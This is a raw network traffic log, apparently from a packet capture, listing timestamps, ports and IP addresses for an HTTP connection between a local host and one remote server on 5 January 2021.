Jan 5, 2021 10:06:48.802037954 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.802048922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.802057028 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.802220106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802242041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802438974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802459955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802679062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802701950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802922964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802961111 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803117990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803139925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803164959 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.803370953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803390980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803572893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803601980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803821087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.803843021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.804022074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.804033041 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.804053068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.804097891 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.804104090 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.804135084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.804250956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.804313898 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.807250977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807286024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807327986 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.807413101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807437897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807487011 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.807626009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807648897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807790995 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.807900906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807924986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.807965994 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.808099031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808135033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808223009 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.808317900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808340073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808408976 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.808530092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808558941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808619022 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.808813095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808844090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.808969021 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.808971882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809062004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809132099 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.809207916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809232950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809290886 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.809442043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809465885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809566975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809582949 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.809823990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809850931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.809931993 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.810015917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810054064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810096025 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.810245991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810270071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810364008 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.810503006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810534954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810703039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810729980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810897112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.810930967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811150074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811175108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811359882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811382055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811594009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811614990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811815977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.811847925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.812103033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.812129021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.812133074 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.812186003 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.812259912 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.812314034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.812500000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.812580109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.813402891 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.814039946 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.815830946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.815855980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.815927982 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.816019058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816049099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816113949 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.816298962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816339970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816375971 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.816473961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816503048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816546917 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.816696882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816730022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816843033 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.816937923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.816962957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817007065 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.817138910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817176104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817281008 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.817420959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817444086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817564964 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.817583084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817616940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817739010 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.817822933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817846060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.817902088 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.818053007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818078995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818171978 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.818255901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818289042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818376064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818486929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818741083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818763971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818964005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.818988085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819195986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819219112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819420099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819468975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819607973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819649935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819684982 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.819700956 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.819890976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819915056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.819948912 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.820094109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820116997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820216894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.820337057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820360899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820386887 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.820625067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820652962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820668936 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.820807934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820830107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.820914984 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.820997953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.821022034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.821070910 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.821217060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.821238041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.821321011 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.824184895 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824214935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824260950 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.824368000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824388981 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824431896 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.824587107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824630022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824670076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.824814081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824848890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.824906111 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.825071096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825098991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825184107 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.825270891 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825303078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825349092 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.825524092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825547934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825740099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825747013 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.825763941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825831890 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.825963020 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.825987101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826185942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826208115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826422930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826446056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826522112 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.826534986 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.826613903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826647043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826720953 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.826864004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.826891899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827089071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827111959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827147007 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.827306986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827337027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827549934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827568054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827749968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827764988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.827791929 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.827811956 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.828012943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828028917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828088999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828099966 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.828208923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828330040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828550100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828577042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828892946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.828919888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.829006910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.829032898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.829253912 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.829276085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.829281092 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.829493999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.829520941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.829579115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.830327988 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.830342054 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.834202051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.834443092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.834470987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.834523916 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.834685087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.834708929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.834813118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.834855080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.834880114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.834930897 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.835091114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.835135937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.835172892 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.835304022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.835395098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.835568905 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.835597992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.835655928 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.835732937 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.835762978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.835825920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836050987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836072922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.836076975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836128950 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.836231947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836258888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836297989 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.836500883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836527109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836719990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836723089 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.836745024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836791039 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.836910009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.836966991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837018013 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.837199926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837227106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837311029 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.837395906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837424040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837515116 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.837584972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837666988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837713957 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.837822914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837883949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.837981939 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.838059902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838083982 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838126898 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.838272095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838311911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838510990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838536024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838727951 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838754892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838952065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.838994026 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.839185953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.839230061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.839385033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.839462996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.840941906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.840967894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841077089 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.841092110 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.841236115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841264009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841314077 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.841412067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841439962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841497898 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.841609001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841650009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841700077 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.841804028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841825962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.841861963 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.842156887 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842211962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842269897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842292070 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.842294931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842371941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.842504025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842545986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842612982 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.842742920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842787027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.842959881 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.843002081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843039036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843159914 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.843205929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843244076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843348026 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.843446970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843483925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843564034 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.843657017 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843687057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843745947 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.843791962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843895912 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.843956947 CET	49170	80	192.168.2.22	79.124.76.20
